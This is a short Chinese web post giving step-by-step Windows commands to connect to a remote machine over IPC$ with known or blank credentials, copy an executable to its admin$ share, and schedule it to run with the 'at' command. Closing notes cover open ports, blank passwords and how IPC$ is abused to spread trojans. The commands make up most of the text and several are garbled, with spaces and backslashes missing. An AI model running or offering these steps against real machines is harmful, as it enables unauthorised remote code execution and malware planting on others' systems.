留言与评论(共有 0 条评论) |
发布时间:2020-04-15 16:32:40
确定目标地址,假如目标为:0.0.0.1,用户名为:test123,密码为:password
要传送的文件是位于D盘的trans.exe。
1、依次单击“开始”—“运行”—输入:cmd—“确定”。
2、进入cmdshell后,输入指令:netuse0.0.0.1ipc$*"password"/user:test123(回车键确定执行)
3、如果提示"命令成功完成",则继续输入指令:copyd:trans.exe0.0.0.1admin$
4、如果提示"已经复制1个文件”,则继续输入:nettime0.0.0.1
5、假如显示"2008年1月1日下午3:15命令成功完成",则继续输入:at0.0.0.115:16trans.exe
6、如果提示"已经增加1个任务",就证明在2008年1月1日下午3点16分在0.0.0.1的机器上执行trans.exe。
7、如果执行完毕,关闭对0.0.0.1的IPC连接,则指令为:netuse0.0.0.1admin$/del
PS:如果第一步netuse那个命令执行不成功,则证明0.0.0.1机器的139/tcp端口和445/tcp端口没有开启。(及Windows共享)
PS2:其实netuse0.0.0.1ipc$*""/user:test123,之间的密码可以不用写,如果不写依然连接成功得到0.0.0.1的cmdshell控制
端,就证明0.0.0.1的test123用户没有密码。
PS3:cmdshell是一种shell程序,shell在计算机项目里的意思是“控制”,也就是说,一个计算机的shell,可以以
输入命令行或者指令的情况下对整个计算机进行最高权限的操作。(cmdshell的中文名可以说成为“命令提示符”)
PS4:IPC的全称为“InternetProcessConnection”,连接对方所开放的共享资源,通过共享“命名渠道”而在目标机器上
得到相应的管理权限,这个过程和连接结果称为“IPC$”,虽说IPC$已经被微软认为是一个安全漏洞,但其实也不算是
漏洞,对黑客而言,IPC$就是漏洞了,因为有些不道德的黑客可能利用IPC$散步木马程序,如果IPC$使用正确,则是管
理员对远程机器进行某种管理。
留言与评论(共有 0 条评论) |
全站搜索